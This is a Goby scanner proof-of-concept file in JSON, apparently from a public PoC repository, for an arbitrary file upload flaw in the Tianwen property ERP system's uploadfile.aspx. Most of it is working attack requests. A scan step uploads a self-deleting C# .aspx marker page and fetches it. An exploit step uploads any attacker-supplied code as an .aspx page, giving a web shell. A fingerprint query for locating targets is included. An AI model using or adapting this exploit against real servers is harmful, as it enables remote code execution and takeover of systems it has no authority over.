-
Notifications
You must be signed in to change notification settings - Fork 197
/
Tianwen_ERP_system__uploadfile.aspx_Arbitraryvfilevupload.json
139 lines (139 loc) · 7.92 KB
/
Tianwen_ERP_system__uploadfile.aspx_Arbitraryvfilevupload.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
{
"Name": "Tianwen ERP system uploadfile.aspx Arbitraryvfilevupload",
"Level": "3",
"Tags": [
"getshell"
],
"GobyQuery": "body=\"天问物业ERP系统\"",
"Description": "/HM/M_Main/uploadfile.aspx An arbitrary file upload vulnerability exists",
"Product": "Tianwen ERP system",
"Homepage": "https://gobies.org/",
"Author": "http://www.tw369.com",
"Impact": "<p>The attacker can use this vulnerability to upload malicious files, control server permissions, and obtain sensitive system information. <br></p>",
"Recommendation": "<p>1. Verify the uploaded file type. In addition to the front-end verification, the backend can be verified by extension detection, rename files, MIME type detection and limit the size of uploaded files to defend, or upload files to other file storage servers. </p><p>2. Strictly restrict and verify uploaded files, and prohibit uploading files with malicious codes. In addition, the execution permission of the directory for uploading files is restricted to prevent Trojan horses from running. </p><p>3. Verify the format of uploaded files strictly to prevent malicious script files from being uploaded; </p><p>4. Strictly restrict the path of uploaded files. </p><p>5. Verify file name extension server whitelist. </p><p>6. Verify file content on the server. </p><p>7. Upload the file and rename it. </p><p> </p>",
"References": [
"https://gobies.org/"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Code",
"Type": "input",
"Value": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/HM/M_Main/uploadfile.aspx",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT"
},
"data_type": "text",
"data": "------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__VIEWSTATE\"\n\n/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__VIEWSTATEGENERATOR\"\n\nDE1005D5\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__EVENTVALIDATION\"\n\n/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"BtnSave\"\n\n确定上传\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"upload_img\"; filename=\"1.aspx\"\nContent-Type: application/octet-stream\n\n<%@Page Language=\"C#\"%>\n<%Response.Write(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"{{{enbs4str1}}}\"))); System.IO.File.Delete(Request.PhysicalPath);%>\n\n------WebKitFormBoundarytKnDdPq6SMXufwyT\n",
"set_variable": [
"str2|rand|str|4",
"enbs4str1|define|base64|str2"
]
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "UploadCallBack",
"bz": ""
}
]
},
"SetVariable": [
"shell_url|lastbody|regex|\\('(.*)'\\)"
]
},
{
"Request": {
"method": "GET",
"uri": "{{{shell_url}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "{{{str2}}}",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/HM/M_Main/uploadfile.aspx",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT"
},
"data_type": "text",
"data": "------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__VIEWSTATE\"\n\n/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__VIEWSTATEGENERATOR\"\n\nDE1005D5\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__EVENTVALIDATION\"\n\n/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"BtnSave\"\n\n确定上传\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"upload_img\"; filename=\"1.aspx\"\nContent-Type: application/octet-stream\n\n{{{Code}}}\n\n------WebKitFormBoundarytKnDdPq6SMXufwyT\n",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|\\('(.*)'\\)"
]
}
],
"PostTime": "2021-10-25 17:37:43",
"GobyVersion": "1.9.304"
}